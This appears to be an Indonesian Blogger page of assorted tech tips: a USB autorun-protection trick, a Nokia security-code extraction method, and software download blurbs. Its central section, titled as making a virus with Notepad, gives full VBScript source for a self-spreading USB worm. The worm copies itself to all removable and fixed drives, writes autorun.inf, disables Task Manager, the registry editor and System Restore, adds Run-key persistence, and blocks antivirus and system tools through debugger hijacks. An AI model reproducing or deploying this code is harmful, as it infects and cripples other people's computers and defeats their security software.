Powered By Blogger

trik Flashdisk Kebal Virus

Khusus utk OS WINDOWS,yg mang rentan bgt trhdp virus.

Ada antivirus buat Flashdisk,tp kadang hanya kompatibel dg Flashdisk keluaran terbaru/U3.
Tuk itu coba trik sederhana gw agar Flashdisk KEBAL VIRUS.

Virus masuk ke UFD(USB FLASH DISK) biasanya melalui file Autorun.inf
jikalau di UFD sudah ada file/folder autorun.inf maka digantikan oleh autorun.inf yg telah ter-infeksi virus.

Mungkin bs coba trik sederhana gw.

Klik Start,Run
Ketik cmd,klik OK
Akan muncul jendela command prompt
pindah ke drive tempat UFD
Misal UFD anda di drive G
Ketik G:
Sesudah itu ketik

md autorun.inf ,enter

md autorun.inf\autorun.ini ,enter

md autorun.inf\autorun.ini\con\\.\\ ,enter.

Tutup jendela command prompt
Maka di UFD akan ada folder autorun.inf yg tidak bisa dihapus(oleh Windows) dan juga tdk bisa diganti/overwrite oleh virus yg sembunyi di autorun.inf

Trik diatas berdasar sbb:

di Windows tdk boleh /tdk dikenal file/folder sama.
Sedang virus meng-infeksi UFD dg cara membuat/mengganti/overwrite file autorun.inf
Jd virus tdk bs menginfeksi UFD karena Windows/virus tdk bisa menghapus/overwrite 'con' folder yg ada di dalam folder autorun.inf
Ga percaya?
Coba buat folder(di Windows) dg nama con,pasti ga akan bisa

Moga bermanfaat.
NB: Flashdisknya harus clean dr virus dulu lo ya

MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD

1. Buka Notepad

2. Copy kan kode dibawah ini:

on error resume next

dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

set longka = createobject(”Scripting.FileSystemObject”)

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 32

set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 39

for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes =32

set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes = 39

set tf =longka.getfile(desades.path &”\autorun.inf”)

tf.attributes = 32

set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &”\autorun.inf”)

tf.attributes=39

end if

next

set F0nAb0530 = createobject(”WScript.Shell”)

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

if check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(”Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

3. Simpan dengan nama Mila.sys.vbs

ANSAV


Nokia Secret Code (Lengkap)

Kalo gw tulis disini kepanjangan bro. mending gw upload dokumennya ntar lo dunlud...

Download

Cara Unlock Security Code Ponsel BB5 (N70,N73,dll) via kabel data USB


Lo ga perlu datang ke konter untuk unlock ponsel BB5, ni gw kasi tips sekalian softwarenya.

Yang diperlukan:
1. Sebuah PC tentunya
2. Kabel Data USB bawaan handphone
3. Software NSS (Nemesis Service Suite)

Langkah2:
1. Sambungkan ponsel ke PC dengan PC suite mode
2. Instal NSS trus pilih "USB VIRTUAL DRIVE" pada waktu instalasi
3. Buka NSS lalu tekan tombol "SCAN"
4. Klik "PHONE INFO" lalu klik "SCAN"
5. Klik tab "PERMANENT MEMORY" di sebelah pojok bawah kanan
6. Klik "READ" untuk membaca flash di dalam handphone dan akan dicopy ke dalam file
*.PM
7. buka file C:\Program Files\NSS\Backup\pm\356252*********.pm (buka dengan notepad)
8. Scroll ke bawah sampai field [308] kolom ke 5
9. Disitulah tempat security code berada. tampilannya akan seperti ini:
5=31323334350000000000 hapus semua angka 3 maka akan tampak seperti dibawah ini:
5= 12345 0000000000 itulah security code ponsel loe "12345"


Kalo mau download Software NSS ni linknya:
Download

Autorun Virus Remover


Autorun Virus Remover provides protection against any malicious programs trying to attack via USB drive. When a USB device is inserted into your computer, Autorun Virus Remover will automatically scan it, block and delete autorun virus, trojans, and malicious code. Also, it can detect and remove USB virus such as autorun.inf virus in your computer.


Autorun Virus Remover can also remove the autorun virus due to which you can't open your hard disk and USB drive (Pen drive, Memory card) by double clicking. Autorun Virus Remover USB antivirus software to permanently protect offline computer against any USB virus without the need for signature updates. This light and easy to use solution is compatible with all software and doesn't slow down your computer at all.

Download

mig33 Room Chatter Beta



Mig33 Chatter Beta 2 merupakan software chat untuk Mig33 melalui PC. Dalam versinya yang Beta 2 ini, tidak beda jauh dengan versi beta 1-nya. Fiturnya masih seperti yang dulu yaitu :
1. Auto Welcome : Jadi setiap user yang masuk room akan disambut secara otomatis dengan kata yang kita ingini
2. Auto Leave : Ketika start kick, maka otomatis user ini akan left sendiri

Sudah itu aja yang menarik, lainnya standar seperti button emoticon, set offline, manual IP address, dll.

Download